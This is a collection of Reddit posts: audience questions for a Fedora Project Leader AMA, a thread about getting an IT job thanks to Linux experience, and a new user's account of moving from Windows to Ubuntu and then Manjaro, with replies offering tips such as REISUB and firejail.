Seems like fedora actually got to commit some good dev time on pre-release tigerlake laptops. I haven't had a laptop and OS feel this "married/integrated" since owning a macbook air
It's good to see Fedora alive and kicking, though more than in the software I'm interested in the community element.

Many years ago I parted with Fedora after repeated incidents of the Fedora support channels such as IRC attempting to profile and censor users based on their country of origin. If you went to the Freenode fedora IRC channel for example and asked for support or for a guide on how to install some components, you were asked (insistently) what country were you from; if you said you were from some Latin American countries such as Cuba or Venezuela any further information would be refused to you, even on matters as simple such as "what is the minimize window combo in Gnome?". You wouldn't even be pointed to the homepage of the Fedora project to download the distro.

My understanding is this stems from some retrograde legislation in the US that was intended for ~~"software"~~ "ammunition" as the concept was understood back in 1960. Has this community censorship been fixed since, and if not, what are the plans to fix it and avoid further cases in the future? Has Fedora considered, or are there plans to consider, relocating the project to a nation without such restricted laws?
When we'll have the feature to update to the next Fedora version without needing backup and reinstall everything?
Why do you think Linus uses Fedora
1) In the bad old days, before Fedora even existed, your primary rival was SuSE.

How has this relationship changed over the years and who do you consider to be Red Hat's primary competition now? Is it going to be Canonical\Ubuntu?

2) One of the things that I have trouble with is all of the little oddities of various RedHat projects.

For example, instead of OpenLDAP, you guys have 389. When I'm using CentOS, I almost always have to use EPEL and SCL. Most people I've talked to almost always enable EPEL.

Why is there this disjoint not only within other distros, buy within RedHat projects proper and are there any plans to better unify everything?
Hey Matthew, thank you for the AMA! I was wondering what your feelings are about the stability and quality control for Fedora as a desktop OS? Are there teams who work on these specific issues or how is the process organized generally? Do you feel that the stability of Fedora on the desktop is improving or not so much (maybe due to difficulties with new hardware)?

I'm asking because I've been using Fedora for many years and it's always been rock solid, but in the last couple of months, I've had a lot of annoying issues with my laptop (a ThinkPad T495). In particular, the Wi-Fi broke on multiple occasions after Intel wireless firmware updates, and very recently, I faced a number of bad system freezes after the firmware for the AMD graphics chip was updated. I know n = 1 is not a representative sample size, but I still wanted to ask you about your thoughts?

Anyway, keep up the great work! Still loving Fedora!
To you, what makes Fedora Fedora? If, the kernel beneath Fedora was swapped out for something else, say, XNU or Zircon, but everything else remained the same, would you consider it Fedora?
Thank you for hosting this AMA!

I was wondering, what is your opinion about the direction GNOME is following, sort of striving to be a second-class Apple\* of open source DEs? Do you see it as sustainable for the long-term future of the FOSS community and developers?

(\*Comparison many rightfully draw due to their unabated cutting down on functions and customization, pushing a philosophy of simplification and "just use as-provided", "adapt to it")
Is it possible at sometime to include AUR?
I am trying to set up raid 0 gpt /boot from a mbr boot partition of an already running server. 

Grub refuses to install on raid auto gpt partition. So I set it to grub_bios. The meta version of RAID array is 1.0 allowing it to store raid blocks at the end of the drive. Will md0 raid partition boot well and build raid, if I make an initrd with raid modules and use the required grub commands?  I am specifically asking about the partition type. 

Also why should I go for a chrooted environment rather than just copying over initrd and boot files to new md0?
Hi and thanks a lot for the opportunity to ask you stuff!
Im the latest Fedora version on my healthy Thinkpad X1 Extreme and the battery life is not that great compared to e.g. Pop_OS that I tested a while ago. Are there plans to further improve battery life/give easy options (GUI) to control battery modes like known from Windows?
I love Fedora but battery life keeps me from leaving the house without a charger unfortunately.
>Fedora Project Leader and Distinguished Engineer

Looks like I need to make up a new job title for myself. "Distinguished Engineer" sounds heaps better than "unemployed"
What is Fedora ??
You personally supported the open letter again Richard Stallman, and as a member of the Fedora leadership supported the campaign to ostracize him from the community. The evidence provided in this open letter was all deliberate blatant lies. They were not ambiguous or subjective points of view, they were outright lies that are verifiably false, all in the attempt to manipulate. 

The actions taken and the lack of evidence provided in support are a direct threat against all individuals that struggle with autism. The only conclusion that can be drawn by anyone who takes the time to investigate the lying and lack of real evidence can only be that if you make any statement that is not in support of the will of the group in power and are sufficiently different enough, you are weird enough, you will be ostracized from the community. It doesn't matter if there is a lack of evidence of wrongdoing or a lack of evidence of sincere attempts to reconcile differences, if your actions make others uncomfortable, regardless of appropriateness, you will be excluded. Anyone you associate with, if they give you speaking time (such as at a convention,) they will also be punished to make sure that your ostracism is complete. This action has marginalized anyone who struggles with social convention, regardless of any attempt to act in good faith.

My ask to you is are you willing to either:

A) Provide objective verifiable evidence that supports the magnitude of your actions taken as both an individual and a leader of a community project to support the campaign to ostracize Richard Stallman, both that he has verifiably committed objective wrongdoing, and that sincere attempts to reconcile were made that were not met with sincere engagement by Stallman.

or B) 1) Personally and publicly recant and withdraw your support of the open letter and the campaign for Richard Stallman's targeted exclusion. 2) Take lead on an initiative for the Fedora Project to recant and withdraw support of actions taken against him. 3) Personally apologize for the insensitive actions taken that have threatened and marginalized all individual who struggle with neurodivergence.
what are the things do you think that fedora has better then ubuntu ? (i know FOSS community dont consider competition to other flavors ,just asking and lowkey me want to switch to fedora )
How much longer do you think it'll take for Wayland to be 100% matured and fully replace X?
Why did you join in with that cringe letter writing campaign against Richard Stallman?
Any favorite Linux podcasts you have in mind? 

Are there any distros that have caught your eye? if so why?

Do you think we'll see Windows OS Linux edition on the 24th?
Do you ever get FEDUP OF FED OR A
Umm hello how's your day?
I've always wondered why packages like tlp, powerop, etc aren't included by default and tuned? Especially with Fedora 34, the laptop experience is starting to feel on-par with Windows and Mac in terms of what GNOME 40 is bringing to the table with gestures and activities. Is there any thought around how to make Fedora more laptop-friendly?
Do you plan into change to a rolling release update system ?
Do you like the interface of gnome?  Especially the file explorer with the default configuration (no minimize and maximize buttons, weird UI color choices for the file explorer)

What are your thoughts on touchpad scrolling in linux browsers when compared to Windows?
I fell in love with fedora. It is as stable as it can be!
I'm too late, I just wanted to say hi :(
1. Why have you put a Fedora User agent string in Firefox, it is not necessary to be tracked.
2. In one interview you said Fedora does not collect logs, but in the next sentence you said you count the number of connections on updates - that doesn't make sense.

Could you explain more on how privacy on Fedora exactly works? 

Other than that great job on my favourite linux distro.
Since this was posted 5 hours ago, I'm assuming I'm way too late for this (or maybe it's answered already somewhere).

I think it's safe to say that Redhat gets good amount of flak for introducing "bloat" into Linux system (i.e., systemd and pulseaudio easily comes to mind). Whether it's deserved or not is not something I can say. I'm just curious to know what Fedora/Redhat team thinks about the people who are against these pieces of software. Their argument is usually that they are too bloated and try to do too much or causes too much overhead. In most cases (to me at least), they seem pretty baseless. Do you know anyone that does actual performance testing on these?
Do you plan to support init again in the future?
how are you ?
I'm working on taking my compTIA linux plus cert on July 6th any study/practical guide tips would be great!
How did it feel to have Linus Torvalds himself choose Fedora as his main OS?
If you compare fedora and android technologically, in which way is android ahead?
Since you mentionned D&D : i'm going to DM my first campaign tomorrow, and I couldn't be more anxious. Any tips on making sure that an adventure is going to be interesting, challenging, and most of all, enjoyable ?
Is silverblue still considered a future for Fedora?

Over the past year it seems to have died in development push and it seems.tk be extremely difficult to find whether any special development focus is being provided to it or if it is just rolling along in past work.
Silly question, but, will dnfdragora ever support flatpak out of the box? Because, it really makes the desktop easily the best. Nobody ever has to use multiple software center, terminal and so on. Thank you.
I've never been able to speak to a person in charge of a Linux project, so, first, thank you!!! 

I and many others love the fruits of your labor so to speak

As for my question:

Would you give a brief opinion of your view of other distros? That is to say, what you like/dislike, maybe what you learn from them, or any other insights?
what do you shoot on and what do you shoot?

also do you publish your shots on any public platform?
How nice to catch an AMA live for a change!

I'm currently doing a course through my 'work' place (a place for people on the autism spectrum to help us grow personal skills as well as IT or multimedia/graphic skills) for junior software engineering. Really, developing web apps using PHP, frameworks etc. I'm using a laptop with the KDE spin of Fedora 34 for it and it's been a great experience. 
My desktop at home is running Manjaro but I'm strongly considering switching to Fedora on there too, once I know if my Nvidia graphics card will play nice with it. 

Too much rambling, sorry about that. I'm excited, lol. Anyhow, my questions for you are: 
Can I do anything to contribute to the Fedora project when my course has finished and I'll know PHP, Laravel and general web development?

What would your personal answer be if anyone asks you why they should use Fedora? 

Also, since I'll play my first game of DND in two weeks: any tips for a newbie?

Thanks for doing this ama!
Are you excited, apprehensive, or could you case less about the release of Diablo II: Resurrected? 

More on topic but very niche:
I was surprised that despite the project always pushing to use and distribute the most recent versions of software, fvwm2 is still the only one of its kind in the repos. When do you think fvwm3 will make it into official repos?
Hi! I'm a student from Singapore. I've dabbled into mostly Debian based OSes and I've been thinking to dual boot to Fedora recently after watching the latest 'Open Tech will Save Us' by Matrix.

2 questions:

1. What's your opinion on Fedora in Singapore (or South East Asia in General)
2. Any way I can get myself involved?
Do you foresee things in the pipeline to help greater plug and play capability for games on Fedora moving forward?  Ubuntu seems to be somewhat spearheading that front, but, I would love to see someone with the resources of RedHat try to make a large push to get linux even more mainstream.
With Chromium now crippled by google across all distros, are Fedora/Redhat getting involved with the development and funding of Firefox to any extent or planning to ?
Whatever happened to running Fedora on Raspberry pi?

I was really surprised when I got my RPi4 that Fedora wasn't supported on it. 18 months later, I'm  used to Raspian. But I'd switch to Fedora tomorrow if I could.
What was your \`eureka\` moment? 

What do you think of android project?

Thank you for doing this.

<3 <3
I'm considering in the future swapping to a different distro of Linux than my current one (Ubuntu 20.04). I'm still pretty entry-level (I only recently swapped to Linux about a month or two ago because I've had too many headaches with Windows and I abhor the amount of data they collect). I do casual gaming (mostly Minecraft, VNs, and older Windows games that seem to run fine under Proton, Wine, and VirtualBox) and I intend to go into computer science for my college major with a future of being a software developer. I also care about security, stability, and limited tracking/data collection.

&#x200B;

As someone with these aspirations, hobbies, and ideals who's functionally brand new to Linux and has only used Ubuntu, would you recommend Fedora as a way to branch out? And if so, what should I know going into Fedora over Ubuntu if I decided to switch completely? I intend to start tinkering with it in a VM before I make any distro swaps, of course, but I'd love to hear from someone higher up in a Linux distro project. Thanks! \^\^
thank you for sharing your time with us 

my question is are excited to ARM PC trend ?

will fedora bliss us with fedora ARM flavor in the future maybe ?
Hey. Thank you for taking the time to engage with the community and for the best UX I have had with a distro (even with an nvidia GPU)

Do you have any automation script/ansible playbook for provisioning new installations (after installation configure your new pc with all the settings, programs, libraries, files you had on your previous one)? 

What is your view on Rust for Linux project and rust in general?
What do you think  Linux / Fedora needs most in order to attract more Desktop users?
[deleted]
[deleted]
What is the best and simplest way to learn the functions of linux
Got my first IT job offer. I have zero professional IT experience. I do have a few certs. What set me apart was on my resume that I put use Linux as a daily driving OS.

Keep in mind this job HAS NOTHING to do with Linux at all.

We go through the interview, I struggled with parts then he asked "You use linux as your main operating system at home?" I go "yea". He flips his monitor around and asks me to complete some fairly trivial basic tasks. He was running Kali. 

* I had to install a program
* I had to uninstall the program
* I had to use a few tools on a website he gave me
* I had to show I know basic commands of navigating around the CLI

I do those really basic tasks and then I ask "Will I be working on Linux in this job?" and he goes "In this role? No you won't be we don't use it here" 

I recently got the job offer, and I was told the thing that set me apart from the other candidates was that I can use Linux. Correct the job literally has NOTHING to do with Linux at all. However he said the fact that I use Linux indicates to him I have the ability to teach myself anything that I need to learn to do the job.

**edit**

It was a VM install. I suspect he set it up for the interview. He was not daily driving Kali. All PCs in this place are using windows
Why was he running Kali though?
Linux made me know a lot about computers in just the first year I used it. Used windows my whole life and barely knew the basics. Just got my first IT job ever 3 months ago because of Linux. 

PS, I have a degree in biology. lol

Congrats and good luck.
You’d be surprised to know that the average punter applying for an IT job has done precisely zero programming or it work outside of what was mandatory for school. They all think they’ll “learn on the job” - oh and get paid $200k per year to do so.

ETA: Congrats btw.
I think people underestimate the desirability of the core set of skills that comes with even basic knowledge of a *nix environment. Particularly troubleshooting. Hell, even navigating a file structure is an insanely useful skill.

One thing I always looked for when hiring for tech positions is people who were unafraid to show they didn't know what/how to do something, and used the time they had to figure it out as interview questions were timed.

I even had one candidate use `cheat.sh` via curl to remind them of some basic commands. I made sure she got my recommendation.

EDIT: Wow, I had no idea that more people didn't know about cheat.sh! Glad this post was helpful then, I guess. :)
Congrats! As someone who is still a student and works for the Comp Sci department at my school and built an image for the labs, this gives me hope lol.
The reason he hired you is because he recognized you as someone who has "it".  Some people have an innate ability to learn IT on their own.   They pickup things quicker, they have a sense of curiosity, they have "it".  Those that don't,  think technology problems are stupid, beneath them and just want something to work.  They wouldnt dream of exploring this stuff on their own time and their eyes gloss over if you mention more  than two sentences of this subject to them.  That's fine, tech isn't their thing and they probably have their own interests that consume them, it takes all kinds of people.

That's what he recognized in you.  You are someone he can work with.   I can recognize if someone has it fairly quickly and I think most people who hang out in technology circles do as well.  You know it when you see it and you know it when you don't.
I both know Linux and when I worked (now retired) I had a few Linux IT people in my organization. 

Here’s a thing I noticed about Linux experience vs. Microsoft product experience.

Microsoft products have a whole world of documentation and support systems around them. Microsoft-using  IT folks could hide that they really didn’t have problem solving skills or an understanding of the concepts behind what they were doing, because there are cookbook recipes for everything.

But the employee who could even do something as simple as “find the right packages and install and configure them from source to serve a simple web page over secure HTTP”… they show they can look stuff up and synthesize information. Totally a better skill set.
Kudos, I became a Linux Admin after mentioning I've used Linux before. Granted I was kinda a Windows admin already for a few years...wait...or was it the other way around...crap I don't remember now.
Congrats for getting the job!
People that understand Linux tend to understand systems and software. People that only know windows understand clicking around relying solely on vendor support. Who would you hire?
By using Linux means you think outside of the square instead of the usual "next, next, finish" Windows people do.

Meaning, you can deal with problems some people wouldn't be able to as easy.

Although anybody can learn, personality comes first. Your attitude had higher weight than your experience so why you got the job.

I already work in IT (managing Linux environment) and shit but my current job uses Google Cloud Kubernetes and Terraform like 99% for everything. During the interview I mentioned that to the CEO, I got the job anyway. 
I built a homelab Kubernetes cluster and a month later I delivered the first project in Kubernetes.

Personally is everything, many companies take that into consideration more than how many certification you have. After all, if your personality doesn't fit the company's culture and the team, everything falls apart.

Congratulations.
I've been telling people this for years. I have 5 close friends who I helped launch their careers by teaching them the absolute bare minimum about to use Linux. And to put that on their resume. 

Only two of them works directly with Linux at their current jobs.
Linux unironically taught me so much about how every computer I've put it on works that I genuinely feel thankful for this OS. It sounds weird but I'm genuinely thankful that Linux and the free software community exists because I never would have come to know so much about my hardware had it not.
How the fuck do you guys land these jobs? I had to leave school before I could get my comp sci degree because it became too challenging to complete during the pandemic and now I have almost nothing to show for it
I had similar experience recently. I am mechanical engineer, recent graduate, job offer was mechanical engineer, doing FEM simulations. One of the questions on 1st interview was if I have any experiences with Linux, with them replying it's a small advantage if I am already familiar with it. I ended getting a job in the same company, but on different team that doesn't use Linux at all.
Linux and homelab helped me for my current gig. I fucked three interviews with overheating devices, and apparently sold myself in the fourth in person.

The suits didn't want me because they thought it was unprofessional to have your device fail mid teams interview. Managed IT supervisor asked about the lab, and he lit up during the chat.

Told me they didn't want me a few months later but that he'd changed their minds. He's since left the company sadly.
My use of Linux and understanding how it works, the CLI, scripting, and applying federal frameworks to Linux machines landed me an internship for a federal contractor. 10 weeks later and now they’re bringing me on full time to do some DevSecOps stuff and building CI/CD pipelines. Linux is king!
I know a lot about Linux, I wish I were you.
I think the IT manager was simply using this as an easy way to see if you were straight out lying in your resume.

Also I think (presumedly) self-taught ability to use Linux implies some sort of ability to learn things..
This is great and is something I've been saying to people for a long time. 

I credit a lot of keeping my job to the shooting the breeze with my boss about linux and helping him troubleshoot his old computer running Manjaro. I only use Windowns in my job.
Every job is going to require training. Being able to hone in on transferable skills that shorten that training time is the mark of a good interviewer and the mark of an org that is in touch with reality.
The thing about Linux is that it's a very DIY-oriented operating system and relies on the user knowing what they are doing to at least some degree.
Yep this is a thing. Now I am a little older I have been on the panel employing a few people. One of my team mates was a Visual C coder at a competing organisation. He wanted a change and we needed Ruby developer on Linux. Ruby devs are somewhat rare these days - mostly all gainfully employed in large companies and not moving. So we met him, got him to talk us through some of his code, asked a few questions, like his answers (could see he was switched on), and he got the job. Then he was asked if he'd be prepared to use a Mac (most the team were developing their Ruby on Mac, but then deploying to Linux for UAT and Production). So he learnt Mac, Linux, and Ruby on the job and has been with us for over 6 years now and is doing really well and never looked back.
IT folk that we have offer no support for the Linux platform
>However he said the fact that I use Linux indicates to him I have the   
ability to teach myself anything that I need to learn to do the job.

Here you have your reason.

Linux kinda has the reputation of being **very** hard to learn, so just the fact that you know it, can open you some doors.

And I don't think it's a good reputation.
I think this is the difference between being in IT and being an IT peeson.
I didn’t even know how to mv a directory when I landed my first job. I got it by googling questions as they asked, luckily my entire interview process was through google chat(not even video chat) back in 2014.. kept learning and now I’m a Site Reliability Engineer. 

So even though your job doesn’t require it, I’d suggest keep learning. It will keep paying off in the long run.
Kudos.  


I was able to leverage Linux experience into a webmaster gig in a Solaris shop back in the 90s.

Did sys admin work on various unix flavors after that, and now all I see on the job is Linux
I've been using Linux for years but won't be able to install and uninstall a program if the distro doesn't use apt.
What was he using Kali for? I thought Kali was purely a hacking distro. Do some people actually use it as their main OS??
I'm more concerned about whether a candidate knows where to find the answer or the solution to a problem than necessarily having the knowledge to solve the problem themself.

New tools come and go every single day. Having the skills to know where to find the answer to a problem is more valuable than actually knowing what that error message means in the event viewer logs (or syslog).
For me, it shows initiative, you are inquisitive.  With that quick simple test you simply not only talked the talk ( I use linux as my main OS) you actually walked the walk by doing a simple task.


You set yourself out there, by learning (my attitude is if your not learning your going backwards) .

It’s a bit like when companies require someone with a degree, it’s not that it may be relevant, it’s more of you can study and focus to get something done!
This is not surprising because usually employers want to see a person be more than a confortable know-how person.
Well, it has been known for generations that Linux users know more about Windows, than Windows users... And BSD users know more about Linux than Linux users.
if you can use linux you probably know how to use google. he is right, whats the issue though? he said you wouldnt be working in linux....
>He was running Kali

You know, something's telling me this didn't happen.
Why is an IT manager giving access to their personal login to someone in an interview? Why would someone who goes out of their way to use Kali be so blatantly lazy about security?

I'm sorry, but this story makes no sense. Maybe it happened, and if it did I'd be kind of wary from the get-go.
Guess putting almost 10 years of linux experience on my resume is gona be neat when I get old enough to get a job
This isn't Linux specific as you can do all those things from WSL on Windows.
>	However he said the fact that I use Linux indicates to him I have the ability to teach myself anything that I need to learn to do the job.

That’s the first thing I tought on why he would be interested
I recommend you to take a look at DevOps sector.
Well color me jealous. Congratulations!
Also don’t let the fact that they “don’t use it here” discourage you from not trying to get it implemented. You might find there’s a workload or process that could be streamlined by using Linux- such as managing Windows servers (or even desktops) with Ansible. And Ansible (the control node) is Linux-only.
Good job on being able to speak to your skillset that you listed on the resume. I interview a lot of people that have "linux" and "command line" listed on their resume and then I ask them simple questions like what is a command line tool you can you can use to check network connectivity and I get deer in headlights looks. The interviewer also seems pretty skilled if they saw you were struggling and gave you a chance to actually demonstrate some basic skills that were in your zone. They are likely looking for someone with a technical aptitude and willing to learn. Hope you enjoy the position if you accept it!
...Was he daily driving kali?
Advocated for using Linux desktop at work. Got to run a proof of concept. That didn't take off, but now I'm on the Mac support team. And continue to advocate use of Linux desktop.
I already was a Linux user and knew shell scripting and how to install from sources when went to an interview that asked for php, js and mysql 15 years ago...

Got out of room and learned php and sql in 15 days...

Who got the job worked half day ran away. I got the job. He was on university. I never did a course in the area since today.

It is like the egg vs chicken problem: self taught people start using Linux or Linux people become self taught?

Obs: in the first day was offered to me to install Windows or Linux in my machine.
> However he said the fact that I use Linux indicates to him I have the ability to teach myself anything that I need to learn to do the job.

This makes sense to me. You went out of your way to learn a different operating system at home, means you have the capacity to learn, and when you're doing it for a job? That means you'll have even more incentive.
I started learning Linux while working in helpdesk in 2018. I caught the attention of the person who became my mentor. Within a year I was in an admin job and I'm now a support engineer at a devops company. 

10/10. Would recommend Linux again.

Congrats, OP!
Used to be in IT until last year. In my current job, I'm more of a sales person than anything else. I had a chat with the IT supervisor who was in the night shift with me. He was installing Windows 10 on one of our office computers. When I told him that I used to be in IT and that I daily drive Linux (I specifically use Fedora and Arch at home), he told me why not apply for an IT position and he would have me handle the Linux file servers in the office. Lol.
Been in IT almost 10 years now, currently a Business Intelligence role. Being able to teach yourself stuff and SOLVE PROBLEMS are really the keys to succeeding. It gets really frustrating when any little thing makes someone throw their hands up and "I don't know" and then just shut down. Problem solving to me is like the key skill you need when technology is constantly evolving. I'm more a generalist, but what that generalist mindset has done is expose me to many different types of technology and problems to solve.

Been using Linux for the last 4 years or so, it  has definitely helped me learn new concepts and work through unique problems. I've ended up using that knowledge at work as well now as we have a Linux server that I am working on setting up some Python stuff on. Definitely learned a lot and like to share that stuff so decided to start a Youtube channel sharing solutions to problems I had or just interesting programs I had. To me, it helps me learn a lot more about stuff I'm working on learning and hopefully it helps people out who are trying to solve some problem or learn something. If I can keep at it, I suspect it could be another factor for future interviews.
I was a *nix sysadmin with over a decades experience and showed up to an interview where they'd assembled people who only knew Windows and who then interviewed me, even after the miscommunication was resolved, about Windows system administration. The stupid thing is they said I did very well, more than well enough to get the job, but they decided not to hire anybody for it. As in, they all knew before the interview started that they'd decided not to hire anyone. One of the dumbest days I've experienced in my career.
I’ve never seen a job interview where interviewers provide a pc to test something even for a technical interview.
Nice! My home lab, with pictures and a network map of my home went a long way with my hiring as well.

Edit: I think scholastic activities are weighed too heavily in a lot of cases, instead of actual real world experience.
install/uninstall means you're slaved to whatever package manager Kali uses - hardly a "linux" skill.
:')
I'm going to be honest from someone who knows Linux and uses it but am no way amazing with it and still learning a lot on a day by day basis and also as someone whose been in IT for 12 years.

Turn and run. 

Yes your ability to learn sets you apart and you should hang your hat on that because it is a super useful skill that will 100% take you far in life. 

I say to turn and run not for that but because it's clear that you will be held to standards around your ability to learn that you may not be able to achieve because the job does not use a tool that they interviewed you on. 

While yes you may be able to learn as you pointed out, they will more than likely be holding you to that in all cases and use you as a scape goat when they need to cut people. I've seen that happen in a similar case many times before.
sudo apt hireme

Congrats!!!

I got a job because the guy asked me what distro I use and I answered Fedora.
Around a month ago, I was getting tired of my mid-to-low tier HP laptop being slowed down by bloat, crashing every other day, and knowing the boys over in Redmond WA were collecting every bit of my data they could. So, after some research and decision making, I installed Ubuntu, (I said screw it and fully transitioned, no dual booting or even a VM).

The first few days were strange, but also really fun. I had no idea what a package manager was, why all the tutorials started cli commands with sudo, or what the hell a focal fossa was. For me, it was like learning how to work a computer all over again. At some points I got frustrated, because a lot of stuff isn't as simple as downloading an .exe and your problem's fixed, (my internal wifi adapter didn't work out of the box, took me 45 minutes to figure out how to manually install the drivers), but I actually found it really fun to figure out how to fix these problems. 

After those first few days, when I started to get comfortable using Linux, I started noticing things. I started really enjoying using my computer again, like how you felt after learning on your first one. I didn't think of it as just an everyday item that does the same things over and over again, I started thinking of it more as a machine with working parts I could take apart to see how they work. For the first time in forever, I actually started having a great time just using my computer. 

Another thing I noticed was how great the community is. Everyone's willing to help you solve a problem, and everyone is just as passionate about it as you are. You don't see stuff like this for any other OS, so I think that's honestly really cool. It's so cool to see new posts on all the subreddits of people showing off their desktops, helping others with problems, and sharing their thoughts and opinions like this. 

So, 1 month later, here I am typing this out on my wonderful Manjaro Xfce machine, feeling great about the choice I made. I just wanna say thank you to you guys for making this 20-something feel excited about technology again!
[deleted]
I've been using Linux for \~17 years and still have no idea what the hell a "focal fossa" is. :-)

Welcome aboard!
> my internal wifi adapter didn't work out of the box, took me 45 minutes to figure out how to manually install the drivers

You just overcame the biggest hurdle that Linux can ever throw at you. From here, everything will be more simple.
Welcome aboard :D
Why did you make the switch to Manjaro? I'm asking because I've been very loyal towards Ubuntu but I am really considering a switch in the near future.
[deleted]
Good Story. Nice to read. And with the experience of 20+ years Linux I can assure You, the fun is going to stay, You'll even more love the community, and never regret having chosen freedom.
yeah it's fun when things work but when they don't... oh boy. lol. 

I just want to use my computer, not troubleshoot a buggy OS. XD 

Windows began to feel like it was stuck in a beta version, never to be fully released and all the users were testers. So many bugs and holes, makes you wonder why even have a "insider" build. lol Whereas with linux, grab yourself a LTS build of some distro and you're good for a few years or more. :)
I have been also use Linux over a year ....it's so smooth and clean
[deleted]
I never recommend people going cold turkey like that.  Most people it seems when they run into the slightest trouble, the first thing they do is run and reinstall Windows.  Dual booting while you're learning is always best.  Sounds like your way worked for you, but for a vast majority, it doesn't.
[deleted]
got another one via stockholm syndrome :D

have fun! :)
Glad to have you in the community!
I've been using Linux for years and years. At least for me, that feeling never went away.
This brought back the feels back when I switched full time from OS X w/ Windows VMs to Linux full time 7 or so years ago. IIRC the distro-hopping progress was (before I got settled) went something along the lines of: Ubuntu->Debian->Manjaro->Gentoo->Arch Linux->Parabola->Qubes OS & Fedora 32 Workstation
I love linux, it may have some odd issues that crop up, but at least it doesnt break itself every other update cycle, been using linux as my main computer (Laptop, Desktop is still windows 10 for gaming and video work) and its treated me stellar... most of the time, but fsr better than win10
I had a similar journey as you had. Laptop slowed down, but specs were just fine (i5 with 8 GB) and plunged into the deep and installed Linux Mint and never look back. must admit I use Ubuntu since 12.04 LTS and don't have the urge to switch back to Windows or any other OS.

And I totally agree that Linux makes computing fun again. I started in the Commodore 64 and MsDos era and really liked computing. With the rise of Windows computing became 'just' a tool to do your job and I lost the fun of computing. With the use of Linux, the fun came back and remain alive and kicking.  So much that I'm a tier 3 support engineer nowadays.

I really love the sheer number of cool tools that are available for Linux.

For example a simple tool like fdupes. I the past I collected quite a few backup disks and I knew I had a lot of duplicate backups, but under Windows, I wasn't able to find a decent tool to remove the duplicates (free or reasonably priced), while for Linux you have plenty options and as a happy side effect, all foss.

Tools to remember as new Linux users if you want to master the command line are 'man', 'apropos', and 'history'.

And you are right; in general, the communities are great but could be toxic as well. The Mint, Ubuntu, and Manjaro communities are very friendly and very helpful.

Just wondering? Why did you already switch distros within a month?
> […] So, after some research and decision making, I installed Ubuntu, (I said screw it and fully transitioned, no dual booting or even a VM). […] So, 1 month later, here I am typing this out on my wonderful Manjaro Xfce machine, feeling great about the choice I made. […]

Ah, already distro hopping. As is tradition.
[Almost there!](https://xkcd.com/456/)
Ah, I see you're a man of ~~culture~~ Manjaro as well.
I'm the lazy type of Linux user. I test a live USB of a distro and see if its built in drivers work with all my devices and if it doesn't I just try a different distro lol.
"a lot of stuff isn't as simple as downloading a .exe"

After using Linux nearly exclusively for about 15 years now, downloading an exe and installing it is about the most terrifying and difficult thing for me for typical desktop usage.

Where do you download it from?
What are all these download buttons?
Why are there so many ads?
Is this safe?
How can I tell if it's safe?
Do I put it in a special folder?
Why does it want to reboot? Did I change the kernel??!!??
Crap I should make a backup in case I download a virus.
Wait where's rsync? How do I backup?

Any time I offer to help my mom with her windows, this drama happens, and it ends up me calling my husband and him helping my mom with her windows.
> how great the community is

Bruh this is legit the best thing about Linux in general. Everyone is so nice and comforting and willing to share knowledge. Many have even ~~really been far even as decided to use even go want to do look more like~~ wrote their own custom scripts that fix common minor issues. As well as the open source part of the community. Did someone stop updating the driver? There’s a good chance someone else picked it up and is continuing it. If not, there’s often a workaround you can do yourself pretty easily. 

It’s so fun to have this community built together for each other. 

But....as you’re a newbie, PLEASE stay away from StackExchange and it’s affiliates like StackOverflow and Sysadmin. 

They are good communities, don’t get me wrong, but they strongly dislike newbies that ask basic questions. 

They require you to know quite a lot about the issue, and just be slightly stumped. They expect in your question that you state you’ve already done basic troubleshooting AND posted results, including log files and error reports if available. 

Which, yeah. People should do that. But as a newbie, you’re probably not going to know how to even begin troubleshooting, and you’re surely not going to know how to take an error report, or even where to find it once it’s generated!

There’s a high chance, because of that, that your question will be downvoted, removed due to lack of info, or completely rewritten by a mod to be more concise, pretty much making assumptions on what your problem is. 

Look, this is only a problem for people that don’t have at least a basic understanding of Linux and computers in general. As soon as you learn a bit more you’ll be very appreciative of Stack and it’s community. 

But! Here’s you a nice starter tip. 

If your Linux system ever gets frozen or bugged up so bad you can’t do anything (which is not common but could happen when attempting a DIY fix) then use BUSIER, backwards!

REISUB, Reboot Even If System Utterly Broken. 

Press ALT+SysReq (or ALT+PrScr) and then press one letter at a time. 

Each key slowly and more aggressively attempts to take back control. It starts off asking for processes to close, then it forces them to, then it dumps all data to disk, then it forcefully takes keyboard and mouse control back from any applications that may have captured it (like a game or VM) and then it eventually hard reboots. 

You don’t have to enter all the letters, if only a few were needed to recover your system. But it’s a neat trick!
&#x200B;

open a terminal  
login as root (or su, or sudo)

install firejail

exit as root user (or su, ...)

type 

firejail firefox \[enter\] 

(or whatever browser you prefer) and leave the terminal up while you browse firefox...

&#x200B;

 also on older systems I prefer .e16 as a wm with gkrellm. No panels, no pagers, just full desktop and all the menus from the mouse. It's lightening fast, elegant, and incredible.
It's nice not having someone else own your hardware.
> having a great time just using my computer

That's the whole point IMO. People may have many reasons to use Linux but at the end of the day, I think this is *the* reason.

When I was using my first Linux distro, which was elementary OS, I remember that I was opening the file manager and just fucking looking at it for a few seconds before going for the file I want to open because it looks so good! Almost three years later, I am still enjoying it so much with my new Ubuntu MATE install, it making me more productive. I just want to use it and makeup reasons thus creating new things, writing, drawing, working, whatever just so I can use my beautiful pc a little more.
Welcome to linux, I've had similar experience too i had a low spec dell laptop that using Windows on it was unbearable so one day i switched to debian completely in loved it ever since.
Try manjaro with KDE too it's Wonderful.
I was moved to Linux because of how the fans on my laptop sounding like jet engines and because of cloud and ml applications too. 

Here, I discover the beauty of the terminal and vim, plus an awesome community :)
New Linux user here. I've been using it daily for 3-4 months. Unfortunately I can't get rid of Windows completely since I use some PCB CAD software that work only on Windows.

I use Manjaro KDE and I'm thinking of switching to GNOME. I have used Ubuntu, Fedora, Mint, Kubuntu, Debian. Nothing was like Manjaro. It is consistent, new, elegant and the community willing to help you.

Sometimes I wish all communities and developers merged together and release one single Linux distro.

It's not difficult to learn, it's just different.
Oh man. You just brought back my first encounter with Linux. 

‘Twas the night when I discovered iPhone 3GS could get Siri. I jailbroke my iPhone and god almighty have mercy, I Installed Ubuntu on my PC. I was about 15/16/17? Definitely not 18 because by this time my life got fucked up. Anyways, I started at around 3 PM and didn’t go to bed until 1 AM. When I finally got Siri to work on my iPhone 3GS, I was so stoked that I just wanted someone to understand and see my success. Unfortunately everyone was passed tf out. Two weeks after my father had a stroke annnnd on my 23rd Birthday he passed away.

So thank you, your experience made me reevaluate the good choices I made. :)
And down the spiral you go...

I also discovered a love for this software and the linux community a few years ago. Loved it so much that, unbeknownst to me, I started studying to become a system administrator. I was having so much fun discovering how an operating system works just for the fun of it that I learned a few really handy, surprisingly employable skills. 

